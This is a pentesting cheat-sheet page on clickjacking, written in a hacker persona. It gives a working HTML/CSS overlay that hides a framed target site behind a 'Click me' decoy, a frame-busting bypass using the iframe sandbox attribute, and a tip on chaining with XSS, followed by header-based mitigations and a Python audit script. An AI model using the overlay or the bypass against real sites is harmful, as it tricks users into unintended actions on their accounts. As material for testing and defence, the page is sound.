d4Rk's 1337 h4x0r guide

Clickjacking


Last updated 3 years ago

Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages.

--

Basic clickjacking attack

Just cover the target site with an overlay, as in the following example, or use Burp Suite's Clickbandit (Burp -> Burp Clickbandit). To prefill form data, try appending parameters to the URL (GET).

<head>
	<style>
		/* Target site: stacked on top (z-index 2) but practically invisible */
		#targetWebsite {
			position: relative;
			width: 800px;
			height: 600px;
			opacity: 0.00001;
			z-index: 2;
		}

		/* Decoy element placed directly beneath the target's sensitive control */
		#decoyWebsite {
			position: absolute;
			top: 450px;
			left: 50px;
			width: 100px;
			height: 20px;
			z-index: 1;
		}
	</style>
</head>
<body>
	<div id="decoyWebsite">
	Click me
	</div>
	<!-- Framed target; the GET parameter prefills its form field -->
	<iframe id="targetWebsite" src="https://website.com?param=value">
	</iframe>
</body>

Bypass frame detection

A common protection against clickjacking is to detect, via JavaScript, whether the page is being framed (frame busting). This can potentially be bypassed with HTML5's sandbox attribute on the iframe: specify allow-forms but omit allow-scripts and allow-top-navigation, so the framed page's script never runs while its forms can still be submitted.

...
<iframe sandbox="allow-forms" id="targetWebsite" src="https://website.com?param=value">
...

Combining with XSS

Sometimes you may be able to combine the attack with XSS, e.g. by delivering an XSS payload via prefilled form data.

Mitigation

  • Setting the X-Frame-Options header to deny, sameorigin or allow-from <website>. Note that allow-from is a legacy value that current browsers do not honour, so only deny and sameorigin provide real protection.

  • Using a Content-Security-Policy: <policy> header, where <policy> contains a frame-ancestors directive set to 'none', 'self' or an explicit origin (frame-ancestors <website>). When both headers are present, frame-ancestors takes precedence over X-Frame-Options.
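To verify that a response actually carries one of these protections, the following is an added example (not code from this guide) that classifies the X-Frame-Options and CSP frame-ancestors headers, treating the legacy ALLOW-FROM value as the unsupported setting it is; the header dictionaries at the bottom are constructed samples.

```python
# Added example (not from the original page): audit response headers for
# framing protection. The header dicts at the bottom are constructed samples.


def csp_frame_ancestors(csp):
    """Source list of the CSP frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            # CSP3: an empty source list matches nothing, like 'none'
            return [p.strip("'").lower() for p in parts[1:]] or ["none"]
    return None


def framing_protection(headers):
    """Return 'deny', 'self', 'allowlist', 'legacy-allow-from' or 'none'.
    CSP frame-ancestors wins over X-Frame-Options when both are sent; X-Frame-Options
    ALLOW-FROM is unsupported by current browsers and counts as no protection."""
    h = {k.lower(): v for k, v in headers.items()}
    sources = csp_frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:
        if sources == ["none"]:
            return "deny"
        return "self" if sources == ["self"] else "allowlist"
    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo == "deny":
        return "deny"
    if xfo == "sameorigin":
        return "self"
    if xfo.startswith("allow-from"):
        return "legacy-allow-from"
    return "none"


def framable_by_third_party(headers):
    """True when any origin can embed the page in an iframe."""
    return framing_protection(headers) in ("none", "legacy-allow-from")


# Constructed samples: the weak configuration beside the corrected one.
WEAK_HEADERS = {"Content-Type": "text/html",
                "X-Frame-Options": "ALLOW-FROM https://partner.example"}
HARDENED_HEADERS = {"Content-Type": "text/html",
                    "X-Frame-Options": "DENY",
                    "Content-Security-Policy": "frame-ancestors 'none'"}

if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(name, framing_protection(hdrs), framable_by_third_party(hdrs))
```

Feed it the headers from a real response (e.g. from a Burp Suite proxy history entry) to see whether the page is still framable by an arbitrary origin.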
